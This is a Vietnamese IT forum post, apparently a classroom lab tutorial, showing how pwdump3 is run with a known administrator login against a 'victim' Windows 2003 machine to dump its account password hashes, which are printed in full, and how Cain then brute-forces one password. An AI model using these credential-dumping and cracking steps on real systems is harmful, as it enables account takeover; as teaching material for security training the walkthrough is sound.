Chia Sẽ Kinh Nghiệm Về IT



Tìm Kiếm Với Google
-


Gởi Ðề Tài Mới  Gửi trả lời
 
Công Cụ Xếp Bài
Tuổi 23-09-2009, 04:15 AM   #1
hoctinhoc
Guest
 
Trả Lời: n/a
Bài 2 - Sử dụng chương trình pwdump3v2 khi có được 1 user administrator của máy nạn n

Bài 2 - Sử dụng chương trình pwdump3v2 khi có được 1 user administrator của máy nạn nhân để có thể tìm được thông tin các user còn lại.


Máy của nạn nhân sử dụng Window 2003 sp0, và có sẵn user “quyen” password là “cisco”, bây giờ dựa vào account này, ta có thể tìm thêm thông tin của những account khác trong máy. Trước tiên ta sử dụng pwdump3.exe để xem các tham số cần nhập vào. Sau đó sử dụng lệnh “pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen”, và nhập vào password của user quyen.


Hình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (647x330).

Ta mở file hao2003sp0 để xem trong thông tin.

Trích dẫn:
  1. aaa:1015:NO PASSWORD*********************:NO PASSWORD*********************:::

  2. anhhao:1010CAF9F8B002C73A0AAD3B435B51404EE:A923F FCC9BE38EBF40A5782BBD9D5E18:::

  3. anhhao1:1011CAF9F8B002C73A0AAD3B435B51404EE:A923 FFCC9BE38EBF40A5782BBD9D5E18:::

  4. anhhao2:1013CAF9F8B002C73A0AAD3B435B51404EE:A923 FFCC9BE38EBF40A5782BBD9D5E18:::

  5. anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98 A2C048C77703D54BD0E88887EFD68E:::

  6. ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A 6E7504DFAF453D4213660AE7D35:::

  7. Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

  8. hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE69 7D71690A769204BEB12283678:::

  9. hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E759 9F673DF11D5C5C4D950F5BF0157:::

  10. hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD030 71D41308B58B9DDBC6D5576D78D:::

  11. haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94 985F28454259BF2A03821FEC8DB:::

  12. hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE 6198C25F8420A93301A5792398CF94C:::

  13. IUSR_113-SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F: 9E6A4AF346F1A1F4833ABFA52ADA9462:::

  14. IWAM_113-SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8: 188AA6E0737F12D16D60F8B64F7AE1FA:::

  15. lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB 0793A85C960A775497C9D738EE:::

  16. quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F1 3A3CE86ED2540DD4E7331E9A2:::

  17. SUPPORT_388945a0:1001:NO
    PASSWORD*********************:F791B19C488F42607235 61D4F484EA09:::

  18. tam:1014:NO PASSWORD*********************:NO PASSWORD*********************:::

  19. test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948 805F797BF2A82807973B89537:::

  20. vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE 697D71690A769204BEB12283678:::



Ta thấy thông tin user quyen có ID là 500, đây là ID của user administrator trong mạng, và user Guest là 501. Ngoài thông tin trên, ta có thêm thông tin về pash hash của user, bây giờ ta sử dụng chương trình Cain để tìm kiếm thông tin về password của các user khác.



Sử dụng Brute Force Attack với user “hiclassceh” và tìm ra password là “1234a”. Password này chỉ có 5 ký tự và dễ dàng bị Brute Force, tuy nhiên đối với những password là “stong password” (password bao gồm chữ hoa và thường, ký tự, số, ký tự đặc biệt) thì sẽ lâu hơn.

Theo VSIC Education Corporation




  Trả lời ngay kèm theo trích dẫn này
Gửi trả lời


Công Cụ
Xếp Bài

Quyền Hạn Của Bạn
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Mở
Hình Cảm xúc đang Mở
[IMG] đang Mở
Mã HTML đang Tắt




Bây giờ là 06:34 AM. Giờ GMT +7



Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.